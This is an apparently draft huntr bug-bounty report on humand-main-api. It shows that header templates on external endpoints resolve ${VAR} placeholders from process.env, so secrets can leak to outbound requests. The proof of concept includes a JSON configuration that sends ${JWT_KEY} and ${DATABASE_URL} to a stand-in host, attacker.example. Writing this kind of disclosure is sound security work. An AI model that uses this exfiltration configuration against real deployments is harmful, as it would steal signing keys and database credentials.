# humand-main-api — Environment variable exfiltration via external endpoint header templating

STATUS: DRAFT
program: humand | platform: huntr | repo: HumandDev/humand-main-api | commit: bb975d08cc

````
Repository URL: https://github.com/HumandDev/humand-main-api
Package Manager: npm
CVSS: Attack Vector: Network
Title: humand-main-api — Environment variable exfiltration via external endpoint header templating
Description:

## huntr Form Fields

```
Package Manager: npm
Version Affected: latest (commit bb975d08cc)
Vulnerability Type: Insertion of Sensitive Information Into Sent Data
CVSS:
  Attack Vector: Network
  Attack Complexity: Low
  Privileges Required: High
  User Interaction: None
  Scope: Changed
  Confidentiality: High
  Integrity: Low
  Availability: Low
Title: External endpoint headers resolve ${ENV_VAR} templates and leak process secrets
```

### Description

`externalEndpoints.ts` resolves `${VARNAME}` placeholders in endpoint headers against `process.env` before sending outbound HTTP requests. Observed code path:

```ts
headers[header] = currentValue.replace(/\$\{\w+}/gi, (paramWithBraces) => {
  const param = paramWithBraces.replace('${', '').replace('}', '');
  return process.env[param] ?? paramWithBraces;
});
```

If an attacker can create or modify external endpoint configuration (directly or via chained SQLi/admin abuse), they can define headers such as `X-Leak: ${JWT_KEY}` and cause sensitive runtime secrets to be transmitted to attacker-controlled infrastructure.

# Proof of Concept

1. Create/update an external endpoint record with an attacker URL and a header template.
2. Set a header such as `X-Env-Leak: ${MASTER_PASSWORD}` or `Authorization: Bearer ${JWT_KEY}`.
3. Trigger endpoint invocation through the application flow.
4. Inspect the attacker server logs and observe the resolved secret values.

Example endpoint configuration (illustrative):

```json
{
  "url": "https://attacker.example/collect",
  "method": "POST",
  "headers": {
    "X-Env-Leak": "${JWT_KEY}",
    "X-DB": "${DATABASE_URL}"
  }
}
```

Expected vulnerable behavior: the outbound request contains resolved environment variable values in its headers.

### Impact

Leaked environment variables can include JWT signing keys, database credentials, AWS credentials, and master password material. This can lead to full account forgery, infrastructure compromise, and lateral movement.

### Occurrences

```
Permalink: https://github.com/HumandDev/humand-main-api/blob/bb975d08cc/src/api/services/externalEndpoints.ts#L57-L66
Description: replaceHeadersWithEnv substitutes ${...} placeholders with process.env values

Permalink: https://github.com/HumandDev/humand-main-api/blob/bb975d08cc/src/api/services/externalEndpoints.ts#L72-L78
Description: invokeExternalEndpoint sends resolved headers to configured external URL
```

### References

```
URL: https://cwe.mitre.org/data/definitions/200.html
Name: CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

URL: https://owasp.org/Top10/A02_2021-Cryptographic_Failures/
Name: OWASP A02 - Cryptographic Failures (secret handling)

URL: https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
Name: OWASP SSRF overview (relevant for exfil channels)
```
````